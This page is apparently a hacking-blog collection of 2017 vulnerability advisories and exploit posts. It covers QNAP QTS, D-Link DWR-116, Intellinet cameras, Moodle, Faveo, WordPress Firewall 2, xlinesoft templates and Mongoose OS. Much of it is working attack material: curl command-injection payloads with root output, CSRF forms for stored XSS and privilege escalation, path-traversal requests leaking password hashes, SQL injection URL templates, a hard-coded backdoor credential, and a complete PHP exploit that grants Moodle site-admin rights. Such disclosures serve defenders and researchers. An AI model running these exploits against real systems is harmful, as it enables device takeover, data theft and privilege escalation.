QNAP QTS multiple RCE vulnerabilities
=====================================
The latest version of this advisory is available at:
https://sintonen.fi/advisories/qnap-qts-multiple-rce-vulnerabilities.txt
Overview
--------
QNAP QTS firmware contains multiple Command Injection (CWE-77)
vulnerabilities that can be exploited to gain remote command execution
on the devices.
Description
-----------
QNAP QTS web user interface CGI binaries include Command Injection
(CWE-77) vulnerabilities. An unauthenticated attacker can execute
arbitrary commands on the targeted device.
Impact
------
The attacker is able to execute arbitrary commands as administrative user
(root). The attacker has full access to all content on the targeted
device, and can read, modify or remove content at will.
Details
-------
The discovered vulnerabilities, described in more detail below, enable
multiple independent attacks described here in brief:
- Unauthenticated Remote Command Execution
The unauthenticated attacker can perform HTTP requests that exploit
the vulnerability to execute arbitrary commands. If the device is
connected to the internet, the vulnerable devices can be taken over in
an automated fashion and can then be used for further attacks.
- Authenticated Remote Command Execution
The authenticated attacker can perform HTTP requests that exploit
the vulnerabilities to execute arbitrary commands. This gives users
that normally have only restricted access to the device full
administrative (root) access to the system and access to all data
stored on the device regardless of the specified access limitations.
Vulnerabilities
---------------
1. [CVE-2017-6361] Command Injection in authLogin.cgi `reboot_notice_msg' (CWE-77)
/cgi-bin/authLogin.cgi CGI has a command injection bug. The
following commands are executed via system():
/sbin/vjbod_util -i '%s' 1>>/dev/null 2>&1
/sbin/vdd_control "%s" %d 2>>/dev/null 2>>/dev/null
The value inserted to %s is obtained from the `reboot_notice_msg' HTTP
request GET parameter.
The reboot_notice_msg is a base64 encoded message of form:
QNAPVJBDTTTTTTTTCCCCCCCCCCCCCCCCLLLLPAYLOAD
- TTTTTTTT is the unix time stamp (last 8 digits)
- CCCCCCCCCCCCCCCC is the command to perform (Disconnect)
- LLLL is the payload length
- PAYLOAD is the payload contents (LLLL bytes)
By creating a crafted reboot_notice_msg value, arbitrary commands
can be executed. For example:
QNAPVJBD88150863 Disconnect 14`(echo;id)>&2`
$ curl -ki "https://TARGET/cgi-bin/authLogin.cgi?reboot_notice_msg=$(printf 'QNAPVJBD%08d%16s 14`(echo;id)>&2`' $(expr $(date +%s) % 100000000) Disconnect|base64|tr -d '\r\n')"
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
Content-type: text/xml
<?xml version="1.0" encoding="UTF-8" ?>
<QDocRoot version="1.0">
<command>Disconnect</command>
<payload>`(echo;id)>&2`</payload>
</QDocRoot>
$
2. [CVE-2017-6360] Command Injection in userConfig.cgi cloudPersonalSmtp `hash' (CWE-77)
/cgi-bin/userConfig.cgi CGI has a command injection bug. The following
command is executed via popen():
/sbin/cloud_util -r %s 2>/dev/null
The value inserted to %s is obtained from the `hash' HTTP request GET
parameter.
An authenticated user can use a specially crafted hash parameter to execute
arbitrary commands as root:
$ curl -ki 'https://TARGET/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;uname%20-a)>%262`'
HTTP/1.1 200 OK
Date: Sun, 26 Feb 2017 22:55:48 GMT
Transfer-Encoding: chunked
Content-Type: text/plain
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
Linux TARGET 3.12.6 #1 SMP Mon Feb 13 01:43:01 CST 2017 x86_64 unknown
Content-type: text/html; charset="UTF-8"
Usage:
/sbin/cloud_util -r [enc_token]
$
3. [CVE-2017-6359] Command Injection in utilRequest.cgi cancel_trash_recovery `pid' (CWE-77)
/cgi-bin/filemanager/utilRequest.cgi CGI has a command injection bug. The
following commands are executed via system():
/bin/kill -9 %s
The value inserted to %s is obtained from the `pid' HTTP request GET
parameter.
An authenticated user can use a specially crafted pid parameter to execute
arbitrary commands as root:
$ curl -k 'https://TARGET/cgi-bin/filemanager/utilRequest.cgi?func=cancel_trash_recovery&sid=SIDVALUE&pid=`id>/tmp/pwned`'
{ "version": "4.2.1", "build": "20170213", "status": 0, "success": "true" }
[~] # cat /tmp/pwned
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
[~] #
Vulnerable devices
------------------
The vulnerabilities were discovered from an QNAP TVS-663, firmware version
4.2.2 Build 20161214. They're also confirmed to work with version 4.2.3
Build 20170213.
CVE-2017-6361 was also confirmed on QNAP HS-251+ running QTS 4.2.2 Build
20161028.
It is believed that these vulnerabilities affect all devices running QTS.
Recommendations to vendor
-------------------------
1. Fix the command injection vulnerabilities by performing proper input
validation (whitelisting) and/or shell metacharacter escaping, or by
utilizing execl family of functions.
End user mitigation
-------------------
- Install the firmware update version 4.2.4 build 20170313 or later.
OR
- Restrict access to the web user interface (ports 8080 and 443).
Credits
-------
The vulnerabilities were discovered by Harry Sintonen / F-Secure Corporation.
Timeline
--------
21.01.2017 discovered vulnerabilities 2 and 3
23.02.2017 discovered vulnerability 1
23.02.2017 reported vulnerability 1 to the vendor
26.02.2017 started to write a preliminary advisory
27.02.2017 sent the preliminary advisory to vendor and CERT-FI
27.02.2017 requested CVE-IDs from MITRE
28.02.2017 received CVE-IDs from MITRE
02.03.2017 inquired status from vendor contact
02.03.2017 vendor confirmed CVE-2017-6361
04.03.2017 vendor confirmed the other two vulnerabilities
13.03.2017 vendor communicated about a upcoming release fixing the vulns
14.03.2017 vendor released QTS 4.2.4 build 20170313 fixing the vulns
15.03.2017 sent update to CERT-FI
21.03.2017 vendor released NAS-201703-21 advisory:
https://www.qnap.com/en/support/con_show.php?cid=113
06.04.2017 public release of the advisory
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863584023
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
<!--
Details
================
Software: WordPress Firewall 2
Version: 1.3
Homepage: https://wordpress.org/plugins/wordpress-firewall-2/
Advisory report: https://security.dxw.com/advisories/csrfstored-xss-in-wordpress-firewall-2-allows-unauthenticated-attackers-to-do-almost-anything-an-admin-can/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)
Description
================
CSRF/stored XSS in WordPress Firewall 2 allows unauthenticated attackers to do almost anything an admin can
Vulnerability
================
HTML is not escaped and there is no CSRF prevention, meaning attackers can put arbitrary HTML content onto the settings page.
Proof of concept
================
Visit the following page, click on the submit button, then visit the plugin’s options page:
-->
<form method=\"POST\" action=\"http://localhost/wp-admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-firewall-2.php\">
<input type=\"text\" name=\"email_address\" value=\""><script>alert(1)</script>\">
<input type=\"text\" name=\"set_email\" value=\"Set Email\">
<input type=\"submit\">
</form>
<!--
In a real attack, forms can be submitted automatically and spear-phishing attacks can be convincing.
Mitigations
================
Disable the plugin until a new version is released that fixes this bug.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2016-12-23: Discovered
2017-03-16: Reported to vendor by email
2017-04-04: Vendor could not be contacted
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
-->
# Title: D-Link DWR-116 Arbitrary File Download
# Vendor: D-Link (www.dlink.com)
# Affected model(s): DWR-116 / DWR-116A1
# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)
# CVE: CVE-2017-6190
# Date: 04.07.2016
# Author: Patryk Bogdan (@patryk_bogdan)
Description:
D-Link DWR-116 with firmware before V1.05b09 suffers from vulnerability
which leads to unathorized file download from device filesystem.
PoC:
HTTP Request:
GET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.2.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP Response:
HTTP/1.0 200 OK
Content-Type: application/x-none
Cache-Control: max-age=60
Connection: close
root:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash
nobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin
ftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin
Fix:
Update device to the new firmware (V1.05b09)
# # # # #
# Exploit Title: My Gaming Ladder System 6.0 - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: http://www.mygamingladder.com/
# Software: http://www.mygamingladder.com/ladder.shtml
# Demo: http://www.ladder.tf2.co.za/
# Version: 6.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/news.php?faqid=[SQL]
# staff :id
# staff :displayname
# staff :pass
# staff :email
# staff :title
# staff :access
# staff :contact
# # # # #
# # # # #
# Exploit Title: My Gaming Ladder Combo System 7.5 - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: http://www.mygamingladder.com/
# Software: http://www.mygamingladder.com/demos.shtml
# Demo: http://www.mygamingladder.com/upgrade/combo/
# Version: 7.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/game.php?gameid=[SQL]
# http://localhost/[PATH]/news.php?newsid=[SQL]
# http://localhost/[PATH]/teams.php?teamid=[SQL]
# http://localhost/[PATH]/match.php?matchid=[SQL]
# staff
# staffaccess
# staffcomments
# teammembers
# teammembersinv
# teams
# # # # #
# # # # #
# Exploit Title: Survey Template v1.1 for ASPRunnerPro,PHPRunner. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=3
# Demo: https://xlinesoft.com/livedemo/survey/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/svv_questions_list.php?mastertable=svv_surveys&masterkey1=[SQL]
# # # # #
# # # # #
# Exploit Title: Quiz Template v1.0 for ASPRunnerPro/PHPRunner. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=2
# Demo: https://xlinesoft.com/livedemo/quiz/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/quiz_responses_add.php?testid=[SQL]
# # # # #
# # # # #
# Exploit Title: Forum Template v1.0 for ASPRunnerPro/PHPRunner/ASPRunner.NET. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=9
# Demo: https://xlinesoft.com/livedemo/forum/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/replies/list?mastertable=topics&masterkey1=[SQL]
# http://localhost/[PATH]/topics/list?search=[SQL]
# # # # #
# # # # #
# Exploit Title: Calendar v2.0 for ASPRunnerPro/PHPRunner/ASPRunner.NET. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/templates/calendar/index.htm
# Demo: https://xlinesoft.com/livedemo/calendar/
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/caldaily_view.php?editid1=[SQL]
# # # # #
# # # # #
# Exploit Title: Shopping Cart Template v1.0 for ASPRunnerPro/PHPRunner. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/templates/shoppingcart/index.htm
# Demo: https://xlinesoft.com/livedemo/shopcart/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/client/shopinventory_list.php?item=[SQL]
# # # # #
# # # # #
# Exploit Title: Document Management Template v1.0 for PHPRunner 8.x,ASPRunnerPro 9.x,ASPRunner.NET 8.x or better.- SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/docmanager
# Demo: https://xlinesoft.com/livedemo/docmanager/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/Share_add.php?hash=[SQL]
# # # # #
# # # # #
# Exploit Title: Invoice Template v1.0 for PHPRunner/ASPRunnerPro/ASPRunner.NET. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/invoice
# Demo: https://xlinesoft.com/livedemo/invoice/livedemo1/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/invoices_view.php?hash=[SQL]
# # # # #
Bitcrack Cyber Security - BitLabs Advisory
http://www.bitcrack.net
Multiple Vulnerabilities in Intellinet NFC-30IR Network Cameras
ADVISORY
--------
Title: Local File Inclusion in CGI-SCRIPT & Hard-Coded Manufacturer Backdoor
Advisory ID: BITL-17-001
Date published: 2017-04-05
Date of last update: 2017-04-05
Vendors contacted: Intellinet
VULNERABILITY
-------------
Type: Local File Inclusion (LFI)(Authenticated) & Hardcoded Manufacturer Backdoor
Risk/Impact: Access to sensitive files & Access control bypass.
Exploitation Type : Remote
CVE Name: CVE-2017-7461 and CVE-2017-7462
DESCRIPTION
------------
We found two vulnerabilities affecting the Intellinet NFC-30IR Camera with
firmware version LM.1.6.16.05
1. [CVE-2017-7461] once authenticated as admin:admin, you can read local files
by requesting the '/cgi-bin/admin/fileread?READ.filePath=<insert here>'
Instead of the developer using server-side scripts to render information, it takes the
plain text files and uses /fileread CGI script to simply return the plain text - the
site then relies on Javascript to "format" the text into something pretty.
There is no sanitization nor lock-down of what paths that script can read, hence all
files can be viewed. Interesting files to request are; /etc/passwd; /etc/boa.conf and more.
2. [CVE-2017-7462] a manufacturer backdoor exists that allows one to access a script
called '/cgi-bin/mft/manufacture' by authenticating as manufacture:erutcafunam
This binary has been analyzed before by other vendors. We did not analyze it again as we
feel this is the same file used in other cameras. Note that the NFC-30IR does NOT have the
wireless_mft executable.
The hard-coded manufacturer user:pass is manufacture:erutcafunam as shown in the
below boa.conf snippet;
/----
--snip--
#ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
ScriptAlias /cgi-bin/operator/ /opt/cgi/operator/
ScriptAlias /cgi-bin/view/ /opt/cgi/view/
ScriptAlias /cgi-bin/admin/ /opt/cgi/admin/
ScriptAlias /cgi-bin/jpg/ /opt/cgi/jpg/
ScriptAlias /cgi-bin/ /opt/cgi/
ScriptAlias /jpg /opt/cgi/jpg
# MFT: Specify manufacture commands user name and password
MFT manufacture erutcafunam
--snip--
----/
This indicates that the camera hardware may be some kind of modified/stripped version
of a Zavio board.
VENDOR RESPONSE/NOTIFICATION
----------------------------
Vendor was given 7 days to respond, and 3 written notifications.
No response received nor acknowledgement.
Vendor has not released updates to fix the vulnerabilities.
CREDITS
-------
Vulnerabilities discovered by Dimitri Fousekis/RuraPenthe
Additional information on how the manufacture CGI executable works was obtained by
information written by Core Security/Francisco Falcon.
PROOF OF CONCEPT CODE
----------------------
LOCAL FILE INCLUSION THROUGH CGI FILE READER
/-----
GET /cgi-bin/admin/fileread?READ.filePath=/etc/passwd HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Referer: http://10.0.0.21/system_info.htm
Cookie: VideoFmt=3
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
-----/
ABOUT BITLABS
-------------
BitLabs is the research division of Bitcrack Cyber Security, a South African & Mauritian
based cyber security company. We specialize in providing our clients with research and
information to combat current and future attacks on their systems and devices.
BitLabs focuses primarily on IoT device research, identifying vulnerabilities and other
attack vectors that can impact users of these devices negatively.
Our Web address is at : http://www.bitcrack.net
DISCLAIMER INFO
---------------
All content of this advisory is Copyright (C) 2017 Bitcrack Cyber Security,
and are licensed under a Creative Commons Attribution Non-Commercial 3.0
(South Africa) License: http://za.creativecommons.org/ and other countries as and when
stipulated.
# Exploit Title: CSRF / Privilege Escalation (Manipulation of Role Agent to Admin) on Faveo version Community 1.9.3
# Google Dork: no
# Date: 05-April-2017
# Exploit Author: @rungga_reksya, @yokoacc, @AdyWikradinata, @dickysofficial, @dvnrcy
# Vendor Homepage: http://www.faveohelpdesk.com/
# Software Link: https://codeload.github.com/ladybirdweb/faveo-helpdesk/zip/v1.9.3
# Version: Community 1.9.3
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVSS 3.0: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L (8.3 - HIGH)
# CVE: 2017-7571
I. Background:
Faveo Helpdesk Open source ticketing system build on Laravel framework. Faveo word is derived from Latin which means to be favourable. Which truly highlights vision and the scope as well as the functionality of the product that Faveo is. It is specifically designed to cater the needs of startups and SME's empowering them with state of art, ticket based support system. In today's competitive startup scenario customer retention is one of the major challenges. Handling client query diligently is all the difference between retaining or losing a long lasting relationship.
II. Description:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
Faveo have role:
- user (Cannot access backend)
- agent (Can access backend but limited)
- admin (Can full access backend)
III. Exploit:
CSRF target is: “/public/rolechangeadmin/USER_ID”
e.g:
user id = 11 (role is agent)
We have low privilege as “agent” to access application, and we want change to be admin role.
- Make sample our script of CSRF (rolechange.html):
<!-- CSRF PoC -->
<html>
<body>
<form action="http://example.com/faveo-helpdesk-1.9.3/public/rolechangeadmin/11" method="POST">
<input type="hidden" name="group" value="1" />
<input type="hidden" name="primary_department" value="3" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
- Before running “rolechange.html”, please login your account as agent and running your html script.
- Yeaaah, now user id 11 become admin privilege ^_^
IV. Thanks to:
- Alloh SWT
- MyBoboboy
- Komunitas IT Auditor & IT Security
Refer:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)
PoC:
https://github.com/ladybirdweb/faveo-helpdesk/issues/446
http://rungga.blogspot.co.id/2017/04/csrf-privilege-escalation-manipulation.html
# Exploit: Moodle SQL Injection via Object Injection Through User Preferences
# Date: April 6th, 2017
# Exploit Author: Marko Belzetski
# Contact: mbelzetski@protonmail.com
# Vendor Homepage: https://moodle.org/
# Version: 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions
# Tested on: Moodle 3.2 running on php7.0 on Ubuntu 16.04
# CVE : CVE-2017-2641
1. Description
In Moodle 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions, any registered user can update any table of the Moodle database via an objection injection through a legacy user preferences setting (Described by Netanel Rubin at http://netanelrub.in/2017/03/20/moodle-remote-code-execution/)
2. PoC
Log in as a regular user and note the URL of the Moodle site, the 'MoodleSession' cookie value and the 'sesskey' parameter along with your 'userid' from the page source. Paste these values into the exploit script, fire the script, re-authenticate and you will be the site administrator.
<?php
//defining the required classes for our exploit
namespace gradereport_singleview\local\ui {
class feedback{
}
}
namespace {
class gradereport_overview_external{
}
class grade_item{
}
class grade_grade{
}
// creating a simple httpPost method which requires php-curl
function httpPost($url, $data, $MoodleSession, $json)
{
$curl = curl_init($url);
$headers = array('Cookie: MoodleSession='.$MoodleSession);
if($json){
array_push($headers, 'Content-Type: application/json');
}else{
$data = urldecode(http_build_query($data));
}
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
// curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy
$response = curl_exec($curl);
curl_close($curl);
return $response;
}
// creating a simple httpGet method which requires php-curl
function httpGet($url, $MoodleSession)
{
$curl = curl_init($url);
$headers = array('Cookie: MoodleSession='.$MoodleSession);
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
// curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy
$response = curl_exec($curl);
curl_close($curl);
return $response;
}
function update_table($url, $MoodleSession, $sesskey, $table, $rowId, $column, $value){
//first we create a gradereport_overview_external object because it is supported by the Moodle autoloader and it includes the grade_grade and grade_item classes that we are going to need
$base = new gradereport_overview_external();
// now we create the feedback object which inherits the vulnerable __tostring() method from its parent
$fb = new gradereport_singleview\local\ui\feedback();
//filling the feedback object with the required properties for the exploit to work
$fb -> grade = new grade_grade();
$fb -> grade -> grade_item = new grade_item();
$fb -> grade -> grade_item -> calculation = "[[somestring";
$fb -> grade -> grade_item -> calculation_normalized = false;
//setting the table which we want to alter
$fb -> grade -> grade_item -> table = $table;
//setting the row id of the row that we want to alter
$fb -> grade -> grade_item -> id = $rowId;
//setting the column with the value that we want to insert
$fb -> grade -> grade_item -> $column = $value;
$fb -> grade -> grade_item -> required_fields = array($column,'id');
//creating the array with our base object (which itself is included in an array because the base object has no __tostring() method) and our payload object
$arr = array(array($base),$fb);
//serializing the array
$value = serialize($arr);
//we'll set the course_blocks sortorder to 0 so we default to legacy user preference
$data = array('sesskey' => $sesskey, 'sortorder[]' => 0);
httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);
//injecting the payload
$data = json_encode(array(array('index'=> 0, 'methodname'=>'core_user_update_user_preferences','args'=>array('preferences'=>array(array('type'=> 'course_overview_course_order', 'value' => $value))))));
httpPost($url.'/lib/ajax/service.php?sesskey='.$sesskey, $data, $MoodleSession,1);
//getting the frontpage so the payload will activate
httpGet($url.'/my/', $MoodleSession);
}
$url = ''; //url of the Moodle site
$MoodleSession = '' //your MoodleSession cookie value
$sesskey = ''; //your sesskey
$table = "config"; //table to update
$rowId = 25; // row id to insert into. 25 is the row that sets the 'siteadmins' parameter. could vary from installation to installation
$column = 'value'; //column name to update, which holds the userid
$value = 3; // userid to set as 'siteadmins' Probably want to make it your own
update_table($url, $MoodleSession,$sesskey,$table,$rowId,$column, $value);
//reset the allversionshash config entry with a sha1 hash so the site reloads its configuration
$rowId = 375 // row id of 'allversionshash' parameter
update_table($url, $MoodleSession,$sesskey,$table,$rowId, $column, sha1(time()));
//reset the sortorder so we can see the front page again without the payload triggering
$data = array('sesskey' => $sesskey, 'sortorder[]' => 1);
httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);
//force plugincheck so we can access admin panel
httpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession);
}
?>
3. Solution:
Upgrade to fixed Moodle versions: 3.2.2, 3.1.5, 3.0.9 or 2.7.19
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/en/research/advisories/
#
#############################################################
#
# Product: Mongoose OS
# Vendor: Cesanta
# CVE ID: CVE-2017-7185
# CSNC ID: CSNC-2017-003
# Subject: Use-after-free / Denial of Service
# Risk: Medium
# Effect: Remotely exploitable
# Authors:
# Philipp Promeuschel <philipp.promeuschel@compass-security.com>
# Carel van Rooyen <carel.vanrooyen@compass-security.com>
# Stephan Sekula <stephan.sekula@compass-security.com>
# Date: 2017-04-03
#
#############################################################
Introduction:
-------------
Cesanta's Mongoose OS [1] - an open source operating system for the Internet of Things. Supported micro controllers:
* ESP32
* ESP8266
* STM32
* TI CC3200
Additionally, Amazon AWS IoT is integrated for Cloud connectivity. Developers can write applications in C or JavaScript (the latter by using the v7 component of Mongoose OS).
Affected versions:
---------
Vulnerable:
* <= Release 1.2
Not vulnerable:
* Patched in current dev / master branch
Not tested:
* N/A
Technical Description
---------------------
The handling of HTTP-Multipart boundary [3] headers does not properly close connections when malformed requests are sent to the Mongoose server.
This leads to a use-after-free/null-pointer-de-reference vulnerability, causing the Mongoose HTTP server to crash. As a result, the entire system is rendered unusable.
The mg_parse_multipart [2] function performs proper checks for empty boundaries, but, since the flag "MG_F_CLOSE_IMMEDIATELY" does not have any effect, mg_http_multipart_continue() is called:
--------------->8---------------
void mg_http_handler(struct mg_connection *nc, int ev, void *ev_data) {
[CUT BY COMPASS]
#if MG_ENABLE_HTTP_STREAMING_MULTIPART
if (req_len > 0 && (s = mg_get_http_header(hm, "Content-Type")) != NULL &&
s->len >= 9 && strncmp(s->p, "multipart", 9) == 0) {
mg_http_multipart_begin(nc, hm, req_len); // properly checks for empty boundary
// however, the socket is not closed, and mg_http_multipart_continue() is executed
mg_http_multipart_continue(nc);
return;
}
---------------8<---------------
In the mg_http_multipart_begin function, the boundary is correctly verified:
--------------->8---------------
boundary_len =
mg_http_parse_header(ct, "boundary", boundary, sizeof(boundary));
if (boundary_len == 0) {
/*
* Content type is multipart, but there is no boundary,
* probably malformed request
*/
nc->flags = MG_F_CLOSE_IMMEDIATELY;
DBG(("invalid request"));
goto exit_mp;
}
---------------8<---------------
However, the socket is not closed (even though the flag "MG_F_CLOSE_IMMEDIATELY" has been set), and mg_http_multipart_continue is executed.
In mg_http_multipart_continue(), the method mg_http_multipart_wait_for_boundary() is executed:
---------------8<---------------
static void mg_http_multipart_continue(struct mg_connection *c) {
struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
while (1) {
switch (pd->mp_stream.state) {
case MPS_BEGIN: {
pd->mp_stream.state = MPS_WAITING_FOR_BOUNDARY;
break;
}
case MPS_WAITING_FOR_BOUNDARY: {
if (mg_http_multipart_wait_for_boundary(c) == 0) {
return;
}
break;
}
--------------->8---------------
Then, mg_http_multipart_wait_for_boundary() tries to identify the boundary-string. However, this string has never been initialized, which causes c_strnstr to crash.
---------------8<---------------
static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
const char *boundary;
struct mbuf *io = &c->recv_mbuf;
struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
if ((int) io->len < pd->mp_stream.boundary_len + 2) {
return 0;
}
boundary = c_strnstr(io->buf, pd->mp_stream.boundary, io->len);
if (boundary != NULL) {
[CUT BY COMPASS]
--------------->8---------------
Steps to reproduce
-----------------
Request to HTTP server (code running on hardware device):
---------------8<---------------
POST / HTTP/1.1
Connection: keep-alive
Content-Type: multipart/form-data;
Content-Length: 1
1
--------------->8---------------
The above request results in a stack trace on the mongoose console:
---------------8<---------------
Guru Meditation Error of type LoadProhibited occurred on core 0. Exception was unhandled.
Register dump:
PC : 0x400014fd PS : 0x00060330 A0 : 0x801114b4 A1 : 0x3ffbfcf0
A2 : 0x00000000 A3 : 0xfffffffc A4 : 0x000000ff A5 : 0x0000ff00
A6 : 0x00ff0000 A7 : 0xff000000 A8 : 0x00000000 A9 : 0x00000085
A10 : 0xcccccccc A11 : 0x0ccccccc A12 : 0x00000001 A13 : 0x00000000
A14 : 0x00000037 A15 : 0x3ffbb3cc SAR : 0x0000000f EXCCAUSE: 0x0000001c
EXCVADDR: 0x00000000 LBEG : 0x400014fd LEND : 0x4000150d LCOUNT : 0xffffffff
Backtrace: 0x400014fd:0x3ffbfcf0 0x401114b4:0x3ffbfd00 0x401136cc:0x3ffbfd30 0x401149ac:0x3ffbfe30 0x40114b71:0x3ffbff00 0x40112b80:0x3ffc00a0 0x40112dc6:0x3ffc00d0 0x40113295:0x3ffc0100 0x4011361a:0x3ffc0170 0x40111716:0x3ffc01d0 0x40103b8f:0x3ffc01f0 0x40105099:0x3ffc0210
--------------->8---------------
